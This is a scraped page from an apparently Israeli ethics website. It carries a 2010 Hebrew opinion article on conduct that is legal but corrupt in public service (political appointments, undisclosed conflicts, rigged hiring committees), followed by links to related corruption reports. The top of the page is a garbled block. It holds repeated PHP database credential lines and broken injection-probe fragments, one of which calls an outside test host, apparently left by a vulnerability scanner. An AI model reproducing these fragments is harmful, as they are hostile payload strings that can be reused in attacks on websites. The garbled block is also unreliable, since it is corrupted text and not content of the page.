$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> כשר אבל מסריח הגיע הזמן לרענן את הריחות
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

זה כשר אבל גם מסריח

תאריך: 10/08/2010 10:45   מחבר: מערכת האתר

"כשר אבל מסריח" הפך ברבות השנים למטבע לשון השגורה בפי אלו שרוצים להביע תחושת מיאוס מהתנהלות מושחתת ולא אתית בשירות הציבורי, הפרטי והמוסדי. עד כמה שהביטוי נשמע וולגרי, הוא מקפל בתוכו אמירה ערכית הנושאת בכנפיה תקווה לבשורות טובות. הבשורות מגיעות במשורה. זה לא מספק. מגיע לחברה שלנו הרבה יותר.

יש לנו את כל הכלים לחטא את האקלים התרבותי והשלטוני, שהזדהם עם השנים. הדיווחים בתקשורת, החקירות, הביקורות, הדיונים, ההרשעות בבתי המשפט, הרימו תרומה להגברת המודעות הציבורית לצורך להילחם בתופעות פסולות שאין בהם משום עבירה על החוק אך יש בהן ליקויים היגייניים שהחוק לא נתן עליהם את הדעת והותיר אותם במתחם "הצבע האפור". אל המתחם הזה חודרים בעלי אינטרסים מגוונים שנזהרים מהפרת החוק ומהעונש הכרוך בגין הפרתו, אך יודעים להלך בין שורות החוק תוך מתן פרשנות יצירתית להתנהלותם המוציאה אותם כשרים אך מריחים לא טוב. קצת דוגמאות:

החוק הישראלי אינו אוסר מפורשות על מינוי פוליטי. בהוראות נציבות המדינה הוגדרו דרכי המינוי של עובדים למשרות בשירות הציבורי, עם חובת קיום מכרז ובלעדיה. שדה המינויים בשירות הציבורי הוא שדה פרוץ שמנוצל על ידי השרים הממונים לקדם מקורבים הזוכים באתנן פוליטי בדמות משרה בכירה עם הטבות נלוות בצידה. הקשרים מדברים ולא הכישורים. כך יוצא, שעובדים מסורים ומקצועיים נדחים לשוליים לטובת חבר מרכז והציבור יוצא נפסד.

המדינה מחליטה על מכירת גרעין השליטה של בנק לאומי, במסגרת תהליך ההפרטה. לאחד הרוכשים הפוטנציאליים קרבה אישית לשר האוצר הממונה על המכירה. בדיונים שמתנהלים סביב הסוגיה, השר הממונה לא מדווח על הקשר שלו לרוכש המעוניין ובכך עלול להטות את הכף לטובת החבר המצפה ממנו לגמול לו טובה על קשרים וכיבודים לאורך שנים.

אנליסט מועסק על ידי בית השקעות שמשקיע את כספיו במספר חברות. אותו אנליסט מסקר את החברות בהן מושקע מעסיקו. לא משנה כמה שיצהיר על אובייקטיביות ומקצועיות גרידא בסקירותיו, לא יוכל האנליסט להימנע מהטיה בלתי נשלטת עת ימליץ לרכוש מניות של החברה המסוקרת שלמעסיקו יש בה עניין כלכלי.

לקו הגמר לאיוש משרה אטרקטיבית הגיעו 5 מועמדים ראויים, העונים על דרישות המשרה. ועדת המכרזים התכנסה לדון ולאשר העסקת מועמד אחד. מתוך הפיינליסטים התברג מועמד שהוא פחות מוצלח. אותו מועמד זוכה לתמיכת הרוב בוועדה והעסקתו מאושרת. איך זה קורה? תפרו לו מכרז. מעסיקו הישיר, משתתף בוועדה. ההליכים מתנהלים לפי הוראות הנוהל הכתוב. חברי הוועדה מסכמים ביניהם לדון בכובד ראש במועמדות של כל אחד בנפרד. נרשם פרוטוקול כנדרש. אך הכול מתברר כאחיזת עיניים. הוועדה התכנסה ביודעה מראש את התוצאה הסופית. זה בלוף. זה כשר אבל מסריח.

התבשיל הוא חוקי. אך הריחות העולים מהתבשיל רעים ומסריחים. הגיע הזמן לטהר את האווירה במטבחים הפוליטיים והציבוריים באשר הם. אם נדרש עדכון חקיקה או הוראות שעה ו/או כל אמצעי אכיפה חדשני ויעיל, אז יאללה. לעבודה .
 

תגיות בעמוד:      כשר אבל מסריח    לקוי    שטח אפור    אתיקה    היגיינה ציבורית    שקיפות   
קיראו מידע ומאמרים נוספים באתר
ח"כ רונית תירוש הזמינה חוות דעת מחברתה עו"ד נורית אלשטיין - עו"ד נורית אלשטיין שהייתה יועצת משפטית לכנסת כתבה חוות דעת לבקשת ח"כ רונית תירוש שתומכת בתביעה להכיר בה כמנכ"ל משרד החינוך שבא מהשירות הציבורי, הכרה שיש לה השפעה מכרעת על גודל הפנסיה שלה.
האלוף יואב גלנט סידר לעצמו נחלה מורחבת ללא היתרים כדין - לפי תחקיר "מעריב" האלוף יואב גלנט, השתלט על שטחים ירוקים במושב עמיקם, שם הקים את ביתו, סלל כבישים ללא היתר, נטע עצים על קרקע לא לו וסידר לעצמו נחלה מורחבת תוך תמיכה ועצימת עיניים של גורמי התכנון והאכיפה.
בג"צ מצא טעם לפגם בהתנהלות אהוד אולמרט בפרשת בנק לאומי - תנועת אומץ עתרה לבג"צ בתביעה להגיש כתב אישום נגד אהוד אולמרט בפרשת מכירת בנק לאומי. באמצעות העתירה ביקשה לבטל החלטת פרקליט המדינה שלא להגיש כתב אישור. בג"צ דחה את העתירה אך קבע שנמצא טעם לפגם בהתנהלות אולמרט
מוסדות החינוך הערביים בירושלים מופלים לרעה לעומת החרדים - עיריית ירושלים קובעת קריטריונים לא שוויוניים לצורך חלוקת תקציבים למוסדות חינוך הגורמים להעדפת המוסדות החרדים להם נציגים בעירייה לעומת המוסדות הערביים.
לוביסטים מנהלים את המדינה ואת חברי הכנסת - לפי תחקיר מיוחד של העיתון גלובס, לוביסטים מועסקים על ידי בעלי הון ואינטרסים בתחומים שונים. הלוביסטים מפעילים את חברי הכנסת כדי שיצביעו לטובת האינטרס של בעל ההון המשלם ללוביסט
עלייה בביצוע עבירות בקרב עובדי המדינה - לפי הדוח שפירסם אגף המשמעת בנציבות שירות המדינה חלה עלייה בביצוע עבירות משמעת שחלקן פליליות על ידי עובדי המדינה
לא שלמת את חובך העיקול וההוצאה לפועל בדרך אליך - מתחקיר "גלובס" והארגון לאמון הציבור עולה כי חברות נוקטות בשיטות גבייה אגרסיביות כלפי חייבים. עורכי דין הפועלים כגובים בשירות בעל החוב שולחים מכתבי איום לחייבים ומאיימים בביצוע עיקולי חשבונות והפעלת הוצאה לפועל